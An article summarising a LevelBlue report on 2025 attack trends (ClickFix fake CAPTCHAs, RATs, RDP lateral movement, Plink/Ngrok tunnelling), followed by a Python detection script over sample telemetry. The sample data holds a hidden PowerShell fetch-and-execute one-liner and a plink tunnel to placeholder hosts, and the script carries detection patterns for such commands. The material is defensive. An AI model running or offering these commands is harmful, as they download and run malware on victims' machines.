Exploring Cyber Deception Threat Trends of 2025: From Fake CAPTCHAs to Remote Access Trojans (RATs)
Cybercriminals are becoming increasingly adept at deception, as highlighted in a recent LevelBlue report. Attackers are utilising social engineering techniques and legitimate tools to navigate through environments undetected. The report indicates a significant rise in the number of customers affected by security incidents, which nearly tripled from 6 per cent in late 2024 to 17 per cent in early 2025. More than half of these incidents originated at the initial access stage. Once attackers gained entry, they acted swiftly, with the average time between compromise and lateral movement dropping below 60 minutes, and in some instances, taking less than 15 minutes. This rapid movement is facilitated by the continued use of familiar tools, such as Remote Desktop Protocol, which remains the most common method for transitioning between systems.
The report also notes a concerning trend in the sophistication of threat actors. Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, remarked on the evolution beyond traditional Business Email Compromise (BEC) schemes. Attackers are now employing targeted social engineering tactics to manipulate users into granting access. Once inside, they deploy Remote Access Trojans and quickly erase their tracks, enabling them to traverse networks with alarming speed. While BEC still accounts for the largest share of initial access at 57 per cent, this figure has decreased from 74 per cent in the previous reporting period. The decline correlates with a sharp increase in fake CAPTCHA scams and help desk impersonation, with social engineering now constituting 39 per cent of initial access methods. The ClickFix campaign exemplifies this trend, where users are deceived into executing a PowerShell command that downloads malware, resulting in a staggering 1,400 per cent increase in related activity over six months. Once inside, attackers rely on a combination of Remote Monitoring and Management tools and tunneling techniques to maintain access, using tools like Plink and Ngrok to create covert connections that blend seamlessly with normal IT operations, making detection by defenders increasingly challenging.
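The ClickFix lure, the sub-60-minute move to RDP and the Plink/Ngrok tunnelling described above can be turned into a small detection pass over endpoint telemetry. The Python below is an added example, not code from the LevelBlue report; the Sysmon-style event fields, hostnames and URLs are constructed placeholders.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (hypothetical process-creation and Windows
# logon events); placeholder hostnames and URLs, not real data.
EVENTS = [
    {"ts": "2025-03-01T09:00:00", "kind": "process", "host": "ws01", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": 'powershell -w hidden -c "iex (iwr http://placeholder.invalid/c)"'},
    {"ts": "2025-03-01T09:05:00", "kind": "process", "host": "ws01", "parent": "cmd.exe",
     "image": "powershell.exe", "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},
    {"ts": "2025-03-01T09:40:00", "kind": "logon", "host": "srv01", "src_host": "ws01", "logon_type": 10},
    {"ts": "2025-03-01T11:00:00", "kind": "process", "host": "srv01", "parent": "cmd.exe",
     "image": "plink.exe", "cmdline": "plink.exe -N user@placeholder.invalid"},
]

# ClickFix lures have the victim paste a command into the Run dialog, so the
# parent is explorer.exe; the command hides its window and fetches a payload.
LURE_PARENTS = {"explorer.exe"}
LURE_MARKERS = re.compile(r"-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|\biwr\b|"
                          r"invoke-webrequest|downloadstring|-enc\w*", re.I)
TUNNEL_TOOLS = {"plink.exe", "ngrok.exe"}     # tunnelling utilities named in the report
LATERAL_WINDOW = timedelta(minutes=60)         # report: lateral movement often inside an hour

def ts(e):
    return datetime.fromisoformat(e["ts"])

def classify_process(e):
    """Label one process-creation event; returns [] when nothing is suspicious."""
    labels = []
    image, parent = e["image"].lower(), e["parent"].lower()
    if image in {"powershell.exe", "pwsh.exe"} and parent in LURE_PARENTS \
            and LURE_MARKERS.search(e["cmdline"]):
        labels.append("clickfix_like_powershell")
    if image in TUNNEL_TOOLS:
        labels.append("tunneling_tool")
    return labels

def scan(events):
    """Return (timestamp, host, label) findings. An RDP logon (type 10) whose
    source host had a ClickFix-like launch within LATERAL_WINDOW is also flagged."""
    findings, compromised = [], {}  # host -> time of first lure hit
    for e in sorted(events, key=ts):
        if e["kind"] == "process":
            for label in classify_process(e):
                findings.append((e["ts"], e["host"], label))
                if label == "clickfix_like_powershell":
                    compromised.setdefault(e["host"], ts(e))
        elif e["kind"] == "logon" and e["logon_type"] == 10:
            t0 = compromised.get(e["src_host"])
            if t0 is not None and ts(e) - t0 <= LATERAL_WINDOW:
                findings.append((e["ts"], e["host"], "rdp_lateral_from_" + e["src_host"]))
    return findings
```

On the constructed events the pass flags the hidden-window PowerShell launch on ws01, the RDP logon to srv01 from ws01 forty minutes later, and the later plink.exe start on srv01, while the scripted inventory run from cmd.exe is left alone.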